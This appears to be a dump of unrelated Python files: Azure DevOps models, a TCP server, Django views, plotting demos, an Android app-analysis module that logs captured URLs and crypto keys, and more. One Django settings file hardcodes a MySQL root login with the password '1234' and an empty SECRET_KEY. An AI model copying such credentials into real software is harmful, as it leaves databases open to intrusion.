"""
:param id:
:type id: int
:param name:
:type name: str
:param pool:
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param project:
:type project: :class:`ProjectReference <azure.devops.v5_1.task_agent.models.ProjectReference>`
:param machines:
:type machines: list of :class:`DeploymentMachine <azure.devops.v5_1.task_agent.models.DeploymentMachine>`
:param size:
:type size: int
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'project': {'key': 'project', 'type': 'ProjectReference'},
'machines': {'key': 'machines', 'type': '[DeploymentMachine]'},
'size': {'key': 'size', 'type': 'int'}
}
def __init__(self, id=None, name=None, pool=None, project=None, machines=None, size=None):
super(DeploymentMachineGroup, self).__init__(id=id, name=name, pool=pool, project=project)
self.machines = machines
self.size = size
class TaskAgent(TaskAgentReference):
"""
A task agent.
:param _links:
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.task_agent.models.ReferenceLinks>`
:param access_point: This agent's access point.
:type access_point: str
:param enabled: Whether or not this agent should run jobs.
:type enabled: bool
:param id: Identifier of the agent.
:type id: int
:param name: Name of the agent.
:type name: str
:param os_description: Agent OS.
:type os_description: str
:param provisioning_state: Provisioning state of this agent.
:type provisioning_state: str
:param status: Whether or not the agent is online.
:type status: object
:param version: Agent version.
:type version: str
:param assigned_agent_cloud_request: The agent cloud request that's currently associated with this agent.
:type assigned_agent_cloud_request: :class:`TaskAgentCloudRequest <azure.devops.v5_1.task_agent.models.TaskAgentCloudRequest>`
:param assigned_request: The request which is currently assigned to this agent.
:type assigned_request: :class:`TaskAgentJobRequest <azure.devops.v5_1.task_agent.models.TaskAgentJobRequest>`
:param authorization: Authorization information for this agent.
:type authorization: :class:`TaskAgentAuthorization <azure.devops.v5_1.task_agent.models.TaskAgentAuthorization>`
:param created_on: Date on which this agent was created.
:type created_on: datetime
:param last_completed_request: The last request which was completed by this agent.
:type last_completed_request: :class:`TaskAgentJobRequest <azure.devops.v5_1.task_agent.models.TaskAgentJobRequest>`
:param max_parallelism: Maximum job parallelism allowed for this agent.
:type max_parallelism: int
:param pending_update: Pending update for this agent.
:type pending_update: :class:`TaskAgentUpdate <azure.devops.v5_1.task_agent.models.TaskAgentUpdate>`
:param properties:
:type properties: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param status_changed_on: Date on which the last connectivity status change occurred.
:type status_changed_on: datetime
:param system_capabilities:
:type system_capabilities: dict
:param user_capabilities:
:type user_capabilities: dict
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'access_point': {'key': 'accessPoint', 'type': 'str'},
'enabled': {'key': 'enabled', 'type': 'bool'},
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'os_description': {'key': 'osDescription', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'status': {'key': 'status', 'type': 'object'},
'version': {'key': 'version', 'type': 'str'},
'assigned_agent_cloud_request': {'key': 'assignedAgentCloudRequest', 'type': 'TaskAgentCloudRequest'},
'assigned_request': {'key': 'assignedRequest', 'type': 'TaskAgentJobRequest'},
'authorization': {'key': 'authorization', 'type': 'TaskAgentAuthorization'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'last_completed_request': {'key': 'lastCompletedRequest', 'type': 'TaskAgentJobRequest'},
'max_parallelism': {'key': 'maxParallelism', 'type': 'int'},
'pending_update': {'key': 'pendingUpdate', 'type': 'TaskAgentUpdate'},
'properties': {'key': 'properties', 'type': 'object'},
'status_changed_on': {'key': 'statusChangedOn', 'type': 'iso-8601'},
'system_capabilities': {'key': 'systemCapabilities', 'type': '{str}'},
'user_capabilities': {'key': 'userCapabilities', 'type': '{str}'}
}
def __init__(self, _links=None, access_point=None, enabled=None, id=None, name=None, os_description=None, provisioning_state=None, status=None, version=None, assigned_agent_cloud_request=None, assigned_request=None, authorization=None, created_on=None, last_completed_request=None, max_parallelism=None, pending_update=None, properties=None, status_changed_on=None, system_capabilities=None, user_capabilities=None):
super(TaskAgent, self).__init__(_links=_links, access_point=access_point, enabled=enabled, id=id, name=name, os_description=os_description, provisioning_state=provisioning_state, status=status, version=version)
self.assigned_agent_cloud_request = assigned_agent_cloud_request
self.assigned_request = assigned_request
self.authorization = authorization
self.created_on = created_on
self.last_completed_request = last_completed_request
self.max_parallelism = max_parallelism
self.pending_update = pending_update
self.properties = properties
self.status_changed_on = status_changed_on
self.system_capabilities = system_capabilities
self.user_capabilities = user_capabilities
class TaskAgentPool(TaskAgentPoolReference):
"""
An organization-level grouping of agents.
:param id:
:type id: int
:param is_hosted: Gets or sets a value indicating whether or not this pool is managed by the service.
:type is_hosted: bool
:param is_legacy: Determines whether the pool is legacy.
:type is_legacy: bool
:param name:
:type name: str
:param pool_type: Gets or sets the type of the pool
:type pool_type: object
:param scope:
:type scope: str
:param size: Gets the current size of the pool.
:type size: int
:param agent_cloud_id: The ID of the associated agent cloud.
:type agent_cloud_id: int
:param auto_provision: Whether or not a queue should be automatically provisioned for each project collection.
:type auto_provision: bool
:param auto_size: Whether or not the pool should autosize itself based on the Agent Cloud Provider settings.
:type auto_size: bool
:param created_by: Creator of the pool. The creator of the pool is automatically added into the administrators group for the pool on creation.
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param created_on: The date/time of the pool creation.
:type created_on: datetime
:param owner: Owner or administrator of the pool.
:type owner: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param properties:
:type properties: :class:`object <azure.devops.v5_1.task_agent.models.object>`
:param target_size: Target parallelism.
:type target_size: int
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'is_hosted': {'key': 'isHosted', 'type': 'bool'},
'is_legacy': {'key': 'isLegacy', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
'pool_type': {'key': 'poolType', 'type': 'object'},
'scope': {'key': 'scope', 'type': 'str'},
'size': {'key': 'size', 'type': 'int'},
'agent_cloud_id': {'key': 'agentCloudId', 'type': 'int'},
'auto_provision': {'key': 'autoProvision', 'type': 'bool'},
'auto_size': {'key': 'autoSize', 'type': 'bool'},
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'owner': {'key': 'owner', 'type': 'IdentityRef'},
'properties': {'key': 'properties', 'type': 'object'},
'target_size': {'key': 'targetSize', 'type': 'int'}
}
def __init__(self, id=None, is_hosted=None, is_legacy=None, name=None, pool_type=None, scope=None, size=None, agent_cloud_id=None, auto_provision=None, auto_size=None, created_by=None, created_on=None, owner=None, properties=None, target_size=None):
super(TaskAgentPool, self).__init__(id=id, is_hosted=is_hosted, is_legacy=is_legacy, name=name, pool_type=pool_type, scope=scope, size=size)
self.agent_cloud_id = agent_cloud_id
self.auto_provision = auto_provision
self.auto_size = auto_size
self.created_by = created_by
self.created_on = created_on
self.owner = owner
self.properties = properties
self.target_size = target_size
class TaskInputDefinition(TaskInputDefinitionBase):
"""
:param aliases:
:type aliases: list of str
:param default_value:
:type default_value: str
:param group_name:
:type group_name: str
:param help_mark_down:
:type help_mark_down: str
:param label:
:type label: str
:param name:
:type name: str
:param options:
:type options: dict
:param properties:
:type properties: dict
:param required:
:type required: bool
:param type:
:type type: str
:param validation:
:type validation: :class:`TaskInputValidation <azure.devops.v5_1.task_agent.models.TaskInputValidation>`
:param visible_rule:
:type visible_rule: str
"""
_attribute_map = {
'aliases': {'key': 'aliases', 'type': '[str]'},
'default_value': {'key': 'defaultValue', 'type': 'str'},
'group_name': {'key': 'groupName', 'type': 'str'},
'help_mark_down': {'key': 'helpMarkDown', 'type': 'str'},
'label': {'key': 'label', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'options': {'key': 'options', 'type': '{str}'},
'properties': {'key': 'properties', 'type': '{str}'},
'required': {'key': 'required', 'type': 'bool'},
'type': {'key': 'type', 'type': 'str'},
'validation': {'key': 'validation', 'type': 'TaskInputValidation'},
'visible_rule': {'key': 'visibleRule', 'type': 'str'},
}
def __init__(self, aliases=None, default_value=None, group_name=None, help_mark_down=None, label=None, name=None, options=None, properties=None, required=None, type=None, validation=None, visible_rule=None):
super(TaskInputDefinition, self).__init__(aliases=aliases, default_value=default_value, group_name=group_name, help_mark_down=help_mark_down, label=label, name=name, options=options, properties=properties, required=required, type=type, validation=validation, visible_rule=visible_rule)
class TaskSourceDefinition(TaskSourceDefinitionBase):
"""
:param auth_key:
:type auth_key: str
:param endpoint:
:type endpoint: str
:param key_selector:
:type key_selector: str
:param selector:
:type selector: str
:param target:
:type target: str
"""
_attribute_map = {
'auth_key': {'key': 'authKey', 'type': 'str'},
'endpoint': {'key': 'endpoint', 'type': 'str'},
'key_selector': {'key': 'keySelector', 'type': 'str'},
'selector': {'key': 'selector', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
}
def __init__(self, auth_key=None, endpoint=None, key_selector=None, selector=None, target=None):
super(TaskSourceDefinition, self).__init__(auth_key=auth_key, endpoint=endpoint, key_selector=key_selector, selector=selector, target=target)
__all__ = [
'AadOauthTokenRequest',
'AadOauthTokenResult',
'AuthenticationSchemeReference',
'AuthorizationHeader',
'AzureManagementGroup',
'AzureManagementGroupQueryResult',
'AzureSubscription',
'AzureSubscriptionQueryResult',
'ClientCertificate',
'DataSource',
'DataSourceBindingBase',
'DataSourceDetails',
'DependencyBinding',
'DependencyData',
'DependsOn',
'DeploymentGroupCreateParameter',
'DeploymentGroupCreateParameterPoolProperty',
'DeploymentGroupMetrics',
'DeploymentGroupReference',
'DeploymentGroupUpdateParameter',
'DeploymentMachine',
'DeploymentMachineGroupReference',
'DeploymentPoolSummary',
'DeploymentTargetUpdateParameter',
'EndpointAuthorization',
'EndpointUrl',
'EnvironmentCreateParameter',
'EnvironmentDeploymentExecutionRecord',
'EnvironmentInstance',
'EnvironmentReference',
'EnvironmentResource',
'EnvironmentResourceReference',
'EnvironmentUpdateParameter',
'GraphSubjectBase',
'HelpLink',
'IdentityRef',
'InputDescriptor',
'InputValidation',
'InputValidationRequest',
'InputValue',
'InputValues',
'InputValuesError',
'KubernetesResource',
'KubernetesResourceCreateParameters',
'MarketplacePurchasedLicense',
'MetricsColumnMetaData',
'MetricsColumnsHeader',
'MetricsRow',
'PackageMetadata',
'PackageVersion',
'ProjectReference',
'PublishTaskGroupMetadata',
'ReferenceLinks',
'ResourceLimit',
'ResourceUsage',
'ResultTransformationDetails',
'SecureFile',
'ServiceEndpoint',
'ServiceEndpointAuthenticationScheme',
'ServiceEndpointDetails',
'ServiceEndpointExecutionData',
'ServiceEndpointExecutionRecord',
'ServiceEndpointExecutionRecordsInput',
'ServiceEndpointRequest',
'ServiceEndpointRequestResult',
'ServiceEndpointType',
'TaskAgentAuthorization',
'TaskAgentCloud',
'TaskAgentCloudRequest',
'TaskAgentCloudType',
'TaskAgentDelaySource',
'TaskAgentJobRequest',
'TaskAgentMessage',
'TaskAgentPoolMaintenanceDefinition',
'TaskAgentPoolMaintenanceJob',
'TaskAgentPoolMaintenanceJobTargetAgent',
'TaskAgentPoolMaintenanceOptions',
'TaskAgentPoolMaintenanceRetentionPolicy',
'TaskAgentPoolMaintenanceSchedule',
'TaskAgentPoolReference',
'TaskAgentPublicKey',
'TaskAgentQueue',
'TaskAgentReference',
'TaskAgentSession',
'TaskAgentSessionKey',
'TaskAgentUpdate',
'TaskAgentUpdateReason',
'TaskDefinition',
'TaskDefinitionEndpoint',
'TaskDefinitionReference',
'TaskExecution',
'TaskGroup',
'TaskGroupCreateParameter',
'TaskGroupDefinition',
'TaskGroupRevision',
'TaskGroupStep',
'TaskGroupUpdateParameter',
'TaskHubLicenseDetails',
'TaskInputDefinitionBase',
'TaskInputValidation',
'TaskOrchestrationOwner',
'TaskOutputVariable',
'TaskPackageMetadata',
'TaskReference',
'TaskSourceDefinitionBase',
'TaskVersion',
'ValidationItem',
'VariableGroup',
'VariableGroupParameters',
'VariableGroupProviderData',
'VariableValue',
'VirtualMachine',
'VirtualMachineGroup',
'VirtualMachineGroupCreateParameters',
'DataSourceBinding',
'DeploymentGroup',
'DeploymentMachineGroup',
'TaskAgent',
'TaskAgentPool',
'TaskInputDefinition',
'TaskSourceDefinition',
]
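# --- Usage sketch (illustrative, not part of the generated module) ---
# A minimal, hedged example of composing the models defined above into a
# task group creation payload. How the payload is then sent (e.g. through the
# v5_1 TaskAgentClient) is outside this file and assumed here.
if __name__ == '__main__':
    _step = TaskGroupStep(
        display_name='Run script',
        enabled=True,
        always_run=False,
        inputs={'script': 'echo hello'},
    )
    _params = TaskGroupCreateParameter(
        name='Sample task group',
        category='Utility',
        instance_name_format='Sample $(name)',
        runs_on=['Agent'],
        tasks=[_step],
        version=TaskVersion(major=1, minor=0, patch=0, is_test=False),
    )
    print(_params.name, len(_params.tasks))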
|
from .acetyl import Acetyl
from .amino import Amino
from .benzoicacid import Benzoicacid
from .biphenyl import Biphenyl
from .carboxyl import Carboxyl
from .ch3 import Ch3
from .cyano import Cyano
from .cyclopropyl import Cyclopropyl
from .difluoromethyl import Difluoromethyl
from .dihydroxyphenyl import Dihydroxyphenyl
from .ethylene import Ethylene
from .fluorophenyl import Fluorophenyl
from .formyl import Formyl
from .hydroxyl import Hydroxyl
from .isopropyl import Isopropyl
from .isopropylbenzene import Isopropylbenzene
from .methoxy import Methoxy
from .methyl import Methyl
from .nitro import Nitro
from .nitrophenyl import Nitrophenyl
from .pentafluorophenyl import Pentafluorophenyl
from .perfluoromethyl import Perfluoromethyl
from .phenol import Phenol
from .phenyl import Phenyl
from .pyrrole import Pyrrole
from .toluene import Toluene
from .triazole import Triazole |
OUTREACH_API_BASE_URL = "https://api.outreach.io"
OUTREACH_AUTHORIZATION_URL = f"{OUTREACH_API_BASE_URL}/oauth/authorize"
OUTREACH_TOKEN_URL = f"{OUTREACH_API_BASE_URL}/oauth/token"
OUTREACH_API_URL = f"{OUTREACH_API_BASE_URL}/api/v2"
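# Usage sketch (illustrative; the client_id and redirect URI values are
# placeholders, not part of this module):
#
#   from urllib.parse import urlencode
#   params = urlencode({
#       "client_id": "<CLIENT_ID>",
#       "redirect_uri": "https://example.com/callback",
#       "response_type": "code",
#   })
#   authorize_url = f"{OUTREACH_AUTHORIZATION_URL}?{params}"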
|
import socket
import threading
import struct
import time
import queue
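# Usage sketch (assumed wire format, matching handle_connection_ below:
# each packet is a 4-byte big-endian length prefix followed by the payload):
#
#   server = TcpServer('127.0.0.1', 9000)
#   server.launch('PacketServer')
#   for payload in server.fetch_package():   # blocks until stop() is called
#       print(len(payload))
#   server.stop()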
class TcpServer(object):
def __init__(self, host, port):
self.host_ = host
self.port_ = port
self.q_ = queue.Queue()
self.sock_ = None
self.quit_event_ = threading.Event()
def launch(self, server_name="Server"):
print("{} launched at {}:{}".format(server_name, self.host_, self.port_))
self.sock_ = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock_.bind( (self.host_, self.port_) )
self.sock_.listen(1)
        # drain any packets left over from a previous run
        with self.q_.mutex:
            self.q_.queue.clear()
self.quit_event_.clear()
pthread = threading.Thread(target=self.start_server_)
pthread.start()
def stop(self):
self.quit_event_.set()
self.q_.put(None)
        if self.sock_ is not None:
            # make a throwaway connection so the blocking accept() returns
            socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect((self.host_, self.port_))
self.sock_.close()
self.sock_ = None
def fetch_package(self):
while not self.quit_event_.is_set():
content = self.q_.get()
if content is None:
break
yield content
def start_server_(self):
# listen to connection request
while not self.quit_event_.is_set():
# blocked for next connection
conn, addr = self.sock_.accept()
thread = threading.Thread(target=self.handle_connection_, args=(conn, addr))
thread.start()
def handle_connection_(self, conn, addr):
conn_id = "{}:{}".format(addr[0], addr[1])
# print('New connection from {}'.format(conn_id))
while not self.quit_event_.is_set():
pack_size = conn.recv(4)
# end of Connection
if not pack_size:
break
pack_size = struct.unpack('>I', pack_size)[0]
# fetch data package
data = self.recv_all_(conn, pack_size)
self.q_.put(data)
conn.close()
# print("Connection {}: closed".format(conn_id))
def recv_all_(self, sock, msg_length):
data = b""
size_left = msg_length
        while len(data) < msg_length and not self.quit_event_.is_set():
            recv_data = sock.recv(size_left)
            if not recv_data:
                # peer closed the connection before the full message arrived
                break
            size_left -= len(recv_data)
            data += recv_data
return data |
import unittest
from Contains_Duplicate_217 import *
'''
Given an array of integers,
find if the array contains any duplicates.
Example 1:
Input: [1,2,3,1]
Output: true
Example 2:
Input: [1,2,3,4]
Output: false
Example 3:
Input: [1,1,1,3,3,4,3,2,4,2]
Output: true
'''
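# A typical implementation these tests assume (sketch; the actual
# Contains_Duplicate_217 module is imported above, not shown here):
#
#   class Solution:
#       def containsDuplicate(self, nums):
#           return len(nums) != len(set(nums))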
class Test_Case(unittest.TestCase):
def test_answer_01(self):
nums = [1,2,3,1]
result = True
self.assertEqual(Solution().containsDuplicate(nums), result)
def test_answer_02(self):
nums = [1,2,3,4]
result = False
self.assertEqual(Solution().containsDuplicate(nums), result)
def test_answer_03(self):
nums = [1,1,1,3,3,4,3,2,4,2]
result = True
self.assertEqual(Solution().containsDuplicate(nums), result)
if __name__ == '__main__':
unittest.main()
|
'Nested context trees for implementing nested scopes (static or dynamic)'
from collections import MutableMapping
from itertools import chain, imap
class Context(MutableMapping):
''' Nested contexts -- a chain of mapping objects.
c = Context() Create root context
d = c.new_child() Create nested child context. Inherit enable_nonlocal
e = c.new_child() Child of c, independent from d
e.root Root context -- like Python's globals()
e.map Current context dictionary -- like Python's locals()
e.parent Enclosing context chain -- like Python's nonlocals
d['x'] Get first key in the chain of contexts
d['x'] = 1 Set value in current context
    del d['x']        Delete from current context
list(d) All nested values
k in d Check all nested values
len(d) Number of nested values
d.items() All nested items
Mutations (such as sets and deletes) are restricted to the current context
when "enable_nonlocal" is set to False (the default). So c[k]=v will always
write to self.map, the current context.
But with "enable_nonlocal" set to True, variable in the enclosing contexts
can be mutated. For example, to implement writeable scopes for nonlocals:
nonlocals = c.parent.new_child(enable_nonlocal=True)
nonlocals['y'] = 10 # overwrite existing entry in a nested scope
    To emulate Python's globals(), read and write from the root context:
globals = c.root # look-up the outermost enclosing context
globals['x'] = 10 # assign directly to that context
To implement dynamic scoping (where functions can read their caller's
namespace), pass child contexts as an argument in a function call:
def f(ctx):
ctx.update(x=3, y=5)
g(ctx.new_child())
def g(ctx):
ctx['z'] = 8 # write to local context
print ctx['x'] * 10 + ctx['y'] # read from the caller's context
'''
def __init__(self, enable_nonlocal=False, parent=None):
'Create a new root context'
self.parent = parent
self.enable_nonlocal = enable_nonlocal
self.map = {}
self.maps = [self.map]
if parent is not None:
self.maps += parent.maps
def new_child(self, enable_nonlocal=None):
'Make a child context, inheriting enable_nonlocal unless specified'
enable_nonlocal = self.enable_nonlocal if enable_nonlocal is None else enable_nonlocal
return self.__class__(enable_nonlocal=enable_nonlocal, parent=self)
@property
def root(self):
'Return root context (highest level ancestor)'
return self if self.parent is None else self.parent.root
def __getitem__(self, key):
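        # search innermost-first; if no map contains the key, `m` ends as the
        # outermost map and m[key] raises the expected KeyError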
for m in self.maps:
if key in m:
break
return m[key]
def __setitem__(self, key, value):
if self.enable_nonlocal:
for m in self.maps:
if key in m:
m[key] = value
return
self.map[key] = value
def __delitem__(self, key):
if self.enable_nonlocal:
for m in self.maps:
if key in m:
del m[key]
return
del self.map[key]
def __len__(self, len=len, sum=sum, imap=imap):
return sum(imap(len, self.maps))
def __iter__(self, chain_from_iterable=chain.from_iterable):
return chain_from_iterable(self.maps)
def __contains__(self, key, any=any):
return any(key in m for m in self.maps)
def __repr__(self, repr=repr):
return ' -> '.join(imap(repr, self.maps))
if __name__ == '__main__':
c = Context()
c['a'] = 1
c['b'] = 2
d = c.new_child()
d['c'] = 3
print 'd: ', d
assert repr(d) == "{'c': 3} -> {'a': 1, 'b': 2}"
e = d.new_child()
e['d'] = 4
e['b'] = 5
print 'e: ', e
assert repr(e) == "{'b': 5, 'd': 4} -> {'c': 3} -> {'a': 1, 'b': 2}"
f = d.new_child(enable_nonlocal=True)
f['d'] = 4
f['b'] = 5
print 'f: ', f
assert repr(f) == "{'d': 4} -> {'c': 3} -> {'a': 1, 'b': 5}"
print len(f)
assert len(f) == 4
assert len(list(f)) == 4
assert all(k in f for k in f)
assert f.root == c
    # dynamic scoping example
def f(ctx):
print ctx['a'], 'f: reading "a" from the global context'
print 'f: setting "a" in the global context'
ctx['a'] *= 999
print 'f: reading "b" from globals and setting "c" in locals'
ctx['c'] = ctx['b'] * 50
print 'f: ', ctx
g(ctx.new_child())
print 'f: ', ctx
def g(ctx):
print 'g: setting "d" in the local context'
ctx['d'] = 44
print '''g: setting "c" in f's context'''
ctx['c'] = -1
print 'g: ', ctx
global_context = Context(enable_nonlocal=True)
global_context.update(a=10, b=20)
f(global_context.new_child())
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# ============================================================================ #
# Project : Deep Learning for Conversion Rate Prediction (CVR) #
# Version : 0.1.0 #
# File : \shade.py #
# Language : Python 3.7.12 #
# ---------------------------------------------------------------------------- #
# Author : John James #
# Email : [email protected] #
# URL : https://github.com/john-james-ai/cvr #
# ---------------------------------------------------------------------------- #
# Created : Thursday, February 3rd 2022, 6:07:19 pm #
# Modified : Friday, February 4th 2022, 2:42:08 pm #
# Modifier : John James ([email protected]) #
# ---------------------------------------------------------------------------- #
# License : BSD 3-clause "New" or "Revised" License #
# Copyright: (c) 2022 Bryant St. Labs #
# ============================================================================ #
#%%
import holoviews as hv
import numpy as np
import panel as pn
import pandas as pd
from holoviews.operation.datashader import (
dynspread,
datashade,
rasterize,
shade,
)
from holoviews.operation import decimate
import datashader as ds
pn.extension()
N = 1000000
x = np.random.random(N)
y = np.random.random(N)
dset = hv.Dataset(pd.DataFrame({"x": x, "y": y, "z1": x * y, "z2": -x * y}))
pts1 = hv.Points(dset, kdims=["x", "y"], vdims=["z1"])
pts2 = hv.Points(dset, kdims=["x", "y"], vdims=["z2"])
agg1 = ds.mean("z1")
agg2 = ds.mean("z2")
opts = dict(height=800, width=800)
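# Overlay a decimated sample of the raw points on each shaded image below,
# presumably so individual points remain inspectable when zoomed in.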
plot1 = datashade(pts1, aggregator=agg1).options(**opts) * decimate(pts1)
plot2 = datashade(pts2, aggregator=agg2).options(**opts) * decimate(pts2)
plots = [("z1", pn.panel(plot1)), ("z2", pn.panel(plot2))]
pn.Tabs(*plots)
|
# flake8: noqa
from .default import *
from .video import *
from .monitors import *
|
from django.shortcuts import render, redirect
from django.utils.crypto import get_random_string
def random_word(request):
""" Displays a random word using get_random_string
Parameters:
- request (django.shortcuts.HttpRequest): the request made to the page
Returns: a rendered page showing a random word
"""
    try:
        request.session['attempt'] += 1
    except KeyError:
        request.session['attempt'] = 1
context = {
'random_word': get_random_string(length=14),
'attempt': request.session['attempt'],
}
return render(request, 'random_word.html', context)
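# Assumed URL wiring for these views (sketch; the project's urls.py is not
# shown in this file):
#
#   from django.urls import path
#   from . import views
#   urlpatterns = [
#       path('random_word', views.random_word),
#       path('reset', views.reset),
#   ]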
def reset(request):
""" Resets the number of attemtps
Parameters:
- request (django.shortcuts.HttpRequest): the request made to the page
Returns: redirects to the random word
"""
request.session['attempt'] = 0
return redirect('/random_word') |
DATABASES={
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'bb_annotation',
'USER': 'root',
        'PASSWORD': '1234',
'HOST': '127.0.0.1',
'PORT': '3306'
}
}
SECRET_KEY = '' |
'''Create a program with a tuple fully populated with the numbers written out
in words, from zero to twenty. The program should read a number from the
keyboard (between 0 and 20) and display it written out.'''
# my solution
num_exte = ('zero', 'one', 'two', 'three', 'four',
            'five', 'six', 'seven', 'eight',
            'nine', 'ten', 'eleven', 'twelve', 'thirteen',
            'fourteen', 'fifteen', 'sixteen',
            'seventeen', 'eighteen', 'nineteen', 'twenty')
while True:
    num_user = int(input('Enter a number from 0 to 20 = '))
    if 0 <= num_user <= 20:
        break
print(f'The number entered is {num_exte[num_user]}')
# the variable used to index the tuple
|
import importlib
from sqlalchemy.orm import sessionmaker, scoped_session
from lib.model import Application
from lib.model.Key import Key
from lib.model.Url import Url
from lib.model.database.Database import Database
from lib.modules.Module import Module
from pathlib import Path
import logging
import glob
import json
class ModuleGeneral(Module):
stop = True
def __init__(self, device, application, plugins):
Module.__init__(self, device, application)
self.plugins = plugins
@staticmethod
def select(path, **kwargs):
logging.debug('ModuleGeneral:select()')
if Path(path).is_file():
return [path]
else:
return glob.glob(f"{path}/*.apk")
def parse(self, message, data):
"""
        Parse the message and call the corresponding function
:param message:
:return:
"""
# if data != None:
# print(f"{message} {data}")
# else:
# print(message)
message_json = json.loads(message)
logging.debug("ModuleGeneral:parse()")
for plugin in self.plugins:
plugin.parse(self, message_json, data)
if message_json['plugin'] == "to_string":
message = message_json['string']
if message.startswith("http://") or message.startswith("https://"):
obj = {"plugin": "url", "url" : message, "stack" : '', "req_method" : ""};
self.url(obj)
return
return
        if message_json['plugin'] == 'url':
self.url(message_json)
return
keys_type = ['key', 'iv', 'Instance']
typeOfMsg = ""
        if message_json['plugin'] in keys_type:
typeOfMsg = message_json['plugin']
self.key(typeOfMsg, data)
return
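    # Message shapes parse() dispatches on (inferred from the branches above;
    # field values are illustrative):
    #   {"plugin": "to_string", "string": "https://example.com/api"}
    #   {"plugin": "url", "url": "https://example.com", "stack": "", "req_method": "GET"}
    #   {"plugin": "key"}   # raw key bytes arrive in the separate `data` argument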
def url(self, url):
'''
        Add a URL to the database
:param url:
:return:
'''
logging.debug("ModuleGeneral:url()")
# Create a thread local session
engine = Database.get_engine()
session_factory = sessionmaker(bind=engine)
Session = scoped_session(session_factory)
session = Session()
Session.remove()
url = Url(url)
# Whitelist Google
# whitelist = ['0.0.0.0', '172.', '216.58.']
whitelist = ['0.0.0.0']
add = True
if url.ip is not None:
for i in whitelist:
if url.ip.startswith(i):
add = False
if add:
# Fetch application for this session ( could not use self.application
# because the usage must be thread local )
application = session.query(Application.Application).get(self.application.id)
logging.debug(repr(url))
            query = (
                session.query(Url)
                .filter(Url.application_id == self.application.id)
                .filter(Url.scheme == url.scheme)
                .filter(Url.domain == url.domain)
                .filter(Url.uri == url.uri)
                .filter(Url.ip == url.ip)
                .filter(Url.query == url.query)
                .filter(Url.req_method == url.req_method)
                .filter(Url.is_up == url.is_up)
            )
resultQuery = query.all()
if len(resultQuery) == 0:
application.url.append(url)
session.add(url)
session.add(application)
else:
                # increment the hit counter on the already-stored URL record
                previous_nb = getattr(resultQuery[0], "nb")
                setattr(resultQuery[0], "nb", previous_nb + 1)
session.commit()
def key(self, typeOfMsg, key):
'''
Add a key to the database
:param type:
:param key:
:return:
'''
# Create a thread local session
engine = Database.get_engine()
session_factory = sessionmaker(bind=engine)
Session = scoped_session(session_factory)
session = Session()
Session.remove()
# Fetch application for this session ( could not use self.application
# because the usage must be thread local )
application = session.query(Application.Application).get(self.application.id)
key = Key(typeOfMsg, key.hex())
logging.debug(repr(key))
query = session.query(Key).filter(Key.application_id==self.application.id).filter(Key.type==key.type).filter(Key.value==key.value)
resultQuery = query.all()
if len(resultQuery) == 0:
application.key.append(key)
session.add(key)
session.add(application)
# else:
# previous_nb = getattr(key, "nb")
# print(previous_nb)
# print(resultQuery[0])
# setattr(resultQuery[0], "nb", previous_nb+1)
# print(getattr(resultQuery[0], "nb"))
session.commit()
|
"""An example of calling a Fortran BMI through Cython."""
import numpy as np
from bmi_heat import Heat
config_file = 'test.cfg'
np.set_printoptions(formatter={'float': '{: 6.1f}'.format})
# Instantiate a model and get its name.
m = Heat()
print(m.get_component_name())
# Initialize the model.
m.initialize(config_file)
# List the model's exchange items.
print('Input vars:', m.get_input_var_names())
print('Output vars:', m.get_output_var_names())
# Get time information from the model.
print('Start time:', m.get_start_time())
print('End time:', m.get_end_time())
print('Current time:', m.get_current_time())
print('Time step:', m.get_time_step())
print('Time units:', m.get_time_units())
# Advance the model by one time step.
m.update()
print('Current time:', m.get_current_time())
# Advance the model by a fractional time step.
m.update_frac(0.75)
print('Current time:', m.get_current_time())
# Advance the model until a later time.
m.update_until(10.0)
print('Current time:', m.get_current_time())
# Get the grid_id for the plate_surface__temperature variable.
var_name = 'plate_surface__temperature'
print('Variable {}'.format(var_name))
grid_id = m.get_var_grid(var_name)
print(' - grid id:', grid_id)
# Get grid and variable info for plate_surface__temperature.
print(' - grid type:', m.get_grid_type(grid_id))
grid_rank = m.get_grid_rank(grid_id)
print(' - rank:', grid_rank)
grid_shape = np.empty(grid_rank, dtype=np.int32)
m.get_grid_shape(grid_id, grid_shape)
print(' - shape:', grid_shape)
grid_size = m.get_grid_size(grid_id)
print(' - size:', grid_size)
grid_spacing = np.empty(grid_rank, dtype=np.float64)
m.get_grid_spacing(grid_id, grid_spacing)
print(' - spacing:', grid_spacing)
grid_origin = np.empty(grid_rank, dtype=np.float64)
m.get_grid_origin(grid_id, grid_origin)
print(' - origin:', grid_origin)
print(' - variable type:', m.get_var_type(var_name))
print(' - units:', m.get_var_units(var_name))
print(' - itemsize:', m.get_var_itemsize(var_name))
print(' - nbytes:', m.get_var_nbytes(var_name))
# Get the temperature values.
val = np.empty(grid_shape, dtype=np.float32)
m.get_value(var_name, val)
print(' - values (streamwise):')
print(val)
print(' - values (gridded):')
print(val.reshape(np.roll(grid_shape, 1)))
# Set new temperature values.
new = np.arange(grid_size, dtype=np.float32)  # real*4 in Fortran
m.set_value(var_name, new)
check = np.empty(grid_shape, dtype=np.float32)
m.get_value(var_name, check)
print(' - new values (set/get, streamwise):')
print(check)
# Get a reference to the temperature values and check that it updates.
print(' - values (by ref, streamwise) at time {}:'.format(m.get_current_time()))
